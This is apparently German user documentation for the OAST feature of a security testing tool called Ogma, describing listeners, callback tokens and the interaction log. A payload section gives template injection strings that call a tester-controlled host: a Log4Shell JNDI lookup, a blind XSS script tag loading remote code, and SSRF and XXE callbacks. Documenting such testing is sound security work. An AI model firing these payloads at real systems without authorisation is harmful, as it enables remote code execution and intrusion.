Zum Inhalt springen

OAST ​

OAST (Out-of-Band Application Security Testing) erkennt Schwachstellen, die keine sichtbare Antwort erzeugen. Stattdessen baut das Ziel eine ausgehende Verbindung zu einem von dir kontrollierten Listener auf und bestätigt dadurch das Problem.

Funktionsweise ​

Ogma betreibt lokale Listener für mehrere Protokolle. Wenn eine Zielanwendung einen dieser Listener kontaktiert, wird die Interaktion mit Quell-IP, Zeitstempel, empfangenen Daten und dem injizierten Token aufgezeichnet.

Listener-Protokolle ​

ProtokollStandardportAnwendungsfall
HTTPKonfigurierbarSSRF, Blind XSS, Webhooks
HTTPSKonfigurierbarSSRF über TLS
DNSKonfigurierbarBlind Injection, XXE, log4shell
SMTPKonfigurierbarE-Mail-Header-Injection, SSRF gegen Maildienste

Konfiguriere die Listener-Ports und den Domainnamen für erzeugte Tokens im OAST-Einstellungspanel.

Ein Callback-Token erzeugen ​

  1. Öffne Hilfswerkzeuge > OAST.
  2. Klicke auf + Neu und anschließend auf Erstellen. Jedes Token ist für den jeweiligen Test eindeutig.
  3. Kopiere das Token. Es enthält deine Listener-Domain und eine eindeutige Kennung, sodass Interaktionen dem jeweiligen Test zugeordnet werden können.

Beispiel für das Tokenformat: [unique-id].[your-oast-domain]

Tokens in Payloads verwenden ​

Injiziere das Callback-Token in jedes Feld, über das die Anwendung eine ausgehende Verbindung aufbauen könnte:

  • SSRF: verwende das HTTP-/HTTPS-Token als Ziel-URL: https://[token]/
  • XXE: referenziere das Token in einem DOCTYPE oder der URL einer externen Entität.
  • Log4Shell: bette es in einen Header ein: ${jndi:ldap://[token]/a}
  • Blind XSS: injiziere es als Script-src: <script src="https://[token]/x.js"></script>
  • SMTP-Injection: verwende es als Zieladresse oder URL in E-Mail-Headern.

Interaktionsprotokoll ​

Das Interaktionspanel zeigt jeden empfangenen Callback:

SpalteBeschreibung
ZeitZeitpunkt des Empfangs der Interaktion
ProtokollHTTP, HTTPS, DNS oder SMTP
Quell-IPIP-Adresse, von der die Verbindung ausging
TokenDas kontaktierte Token
DatenAnfragepfad, DNS-Abfragename oder SMTP-Daten

Klicke auf eine Zeile, um die vollständigen Interaktionsdetails zu sehen, gegebenenfalls einschließlich Anfrage-Headern und Body.

Interaktionen Tests zuordnen ​

Da jedes Token eindeutig ist, kannst du verschiedene Tokens in unterschiedliche Parameter oder Anfragen injizieren und genau feststellen, welcher Injektionspunkt den Callback ausgelöst hat.

Proprietäre Software. Alle Rechte vorbehalten.